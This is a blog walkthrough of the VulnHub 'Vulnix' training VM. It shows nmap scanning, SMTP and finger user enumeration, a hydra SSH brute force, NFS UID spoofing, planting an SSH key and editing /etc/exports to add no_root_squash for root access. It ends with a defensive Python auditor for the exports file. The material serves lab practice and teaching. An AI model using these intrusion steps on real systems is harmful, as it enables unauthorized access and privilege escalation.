HACKLAB: VULNIX vulnhub walkthrough

hidepatidar
5 min read · Nov 25, 2021

Vulnix is a vulnerable box available from VulnHub. You can download this box using this link.

Download the vulnix box and configure it in VirtualBox.

Let’s start enumeration:

First we look for the vulnerable box's IP address, so we use the netdiscover command to scan for IP addresses.

$ sudo netdiscover

Now use nmap to scan all ports and identify how many ports are open on the vulnix box.

$ nmap -v -p- 192.168.1.206

Now scan with the default scripts and version detection.

$ sudo nmap -sC -sV -sT -sU -A -p 22,25,79,110,111,143,512,513,514,993,995,2049,44246,44396,50666,53444,60055 192.168.1.206

We see ports 22, 25, 79, 110, 111, 143, 512, 513, 514, 993 and 2049, which are running known services.

Let’s enumerate SMTP on port 25.

$ telnet 192.168.1.206 25

This confirms that the SMTP service is running properly on port 25.

Now enumerate SMTP users with the smtp-user-enum tool in Kali Linux.

$ smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 192.168.1.206

Now we have the SMTP users, so create a user file.

$ vim user.txt

Now cut the usernames from field 2.

$ cat user.txt |cut -d " " -f 2
$ cat user.txt |cut -d " " -f 2 >users.txt

Next, enumerate port 79, which is running the finger service.

Clone this pentestmonkey repo and enumerate the finger service.

Let’s run the pentestmonkey script.

$ ./finger-user-enum.pl -U ../users.txt -t 192.168.1.206

We see that only one user's home directory exists.

Now we have a user whose home directory exists. Next we have the NFS service, so let’s enumerate it.

$ showmount -e 192.168.1.206

Now mount the NFS share.

$ sudo mount -t nfs 192.168.1.206:/home/vulnix /mnt/data/

We don’t have permission to access this shared folder.

Now we have a problem: root squashing is enabled, so we can't read this directory's content.

After enumerating all services we haven't found any sensitive content, so let’s brute-force SSH with the users whose home directory exists. We have only one such user, "user", so brute-force with this user.

$ hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.1.206 ssh

Now that we have found the password, let’s log in as user over SSH.

$ ssh user@192.168.1.206
password: letmein

Now let’s take the next approach, privilege escalation. Let’s

We don’t find any useful data here, but we do have the /etc/passwd file, which contains the UID and GID of the user vulnix. Copy the vulnix UID and create a user with the same name and the same UID on your local PC, then enumerate NFS again. The NFS server trusts the UID sent by the client, so this may get past the NFS permission denied error.

$ cat /etc/passwd

Note the vulnix UID and GID. Now add a user vulnix with UID 2008 on your local PC to access NFS.

$ sudo useradd -u 2008 vulnix

Now we have the vulnix user. Switch to the vulnix user and mount the NFS share.

$ showmount -e 192.168.1.206
$ sudo mount -t nfs 192.168.1.206:/home/vulnix /mnt/data/

Now set a password for the vulnix user with the passwd command and log in.

$ sudo passwd vulnix
$ su vulnix

We have an sh shell. Switch from sh to a bash shell and look at the content of the mounted directory.

Now make a directory in the NFS share location.

Now generate an SSH key and paste it as the authorized_keys file in the .ssh directory.

$ ssh-keygen

The SSH key is generated properly. Now copy the id_rsa.pub file to the /tmp directory, because the /tmp directory has 777 permissions.

$ cp /home/hide/.ssh/id_rsa.pub /tmp/

Copy id_rsa.pub from /tmp/id_rsa.pub to authorized_keys.

$ cp /tmp/id_rsa.pub authorized_keys

Now give the id_rsa file 600 permissions and make the connection.

$ chmod 600 id_rsa
$ ssh -i id_rsa vulnix@192.168.1.206

Let’s enumerate the vulnix user.

$ sudo -l

We have sudo rights to change the /etc/exports NFS configuration file. Let’s look at the NFS configuration file.

$ cat /etc/exports

Now misconfigure this file: replace root_squash with no_root_squash and add an entry for root to this file.

/root *(rw,no_root_squash)

Now save and exit, then restart the box so that the NFS service restarts. After the restart you will see

After restarting the box, we run the showmount command again to see what can be mounted.

$ showmount -e 192.168.1.206

Now mount again, this time the root user's directory.

$ sudo mount -t nfs 192.168.1.206:/root /mnt/data2

Now switch from the normal user to root and access the NFS share.

We have root user privileges. If you want to log in as the root user, you can upload the id_rsa.pub file to the root directory.

Now we have complete root privileges and we have trophy.txt.
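Seen from the defender's side, both NFS steps above come down to what /etc/exports allows. The following check is an added example, not part of the original walkthrough: it flags no_root_squash, exports open to any host, and writable exports that accept AUTH_SYS, where the server trusts the UID the client sends. The sample file content and the finding names are constructed for illustration, and it assumes one export per line with no spaces inside the option lists.

```python
import re

# Constructed sample, modelled on the walkthrough: the /home/vulnix share with
# root squashing on, the /root line added above, and one hardened entry.
SAMPLE_EXPORTS = """\
# /etc/exports (constructed sample)
/home/vulnix  *(rw,root_squash)
/root         *(rw,no_root_squash)
/srv/docs     192.168.1.50(ro,root_squash,sec=krb5p)
"""

TOKEN = re.compile(r"([^()]*)(?:\(([^)]*)\))?")  # client, client(opts) or (opts)


def uses_auth_sys(opts):
    """True if the export accepts AUTH_SYS (the default when sec= is absent)."""
    flavors = [f for o in opts if o.startswith("sec=") for f in o[4:].split(":")]
    return not flavors or any(not f.startswith("krb5") for f in flavors)


def audit_exports(text):
    """Return (path, client, finding) tuples for risky export entries."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        path, *clients = line.split()
        for token in clients or ["*"]:  # no client listed: exported to everyone
            m = TOKEN.fullmatch(token)
            if not m:
                continue
            client = m.group(1) or "*"
            opts = {o.strip() for o in (m.group(2) or "").split(",") if o.strip()}
            if "no_root_squash" in opts:
                # remote UID 0 keeps root rights on the exported files
                findings.append((path, client, "NO_ROOT_SQUASH"))
            if client == "*":
                findings.append((path, client, "ANY_HOST"))
            if "rw" in opts and uses_auth_sys(opts):
                # root_squash only remaps UID 0; other client-chosen UIDs are trusted
                findings.append((path, client, "AUTH_SYS_RW"))
    return findings


if __name__ == "__main__":
    for path, client, finding in audit_exports(SAMPLE_EXPORTS):
        print(f"{path:14} {client:15} {finding}")
```

The hardened /srv/docs entry produces no findings because it is read-only, limited to one host and requires Kerberos.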

happy hacking :)
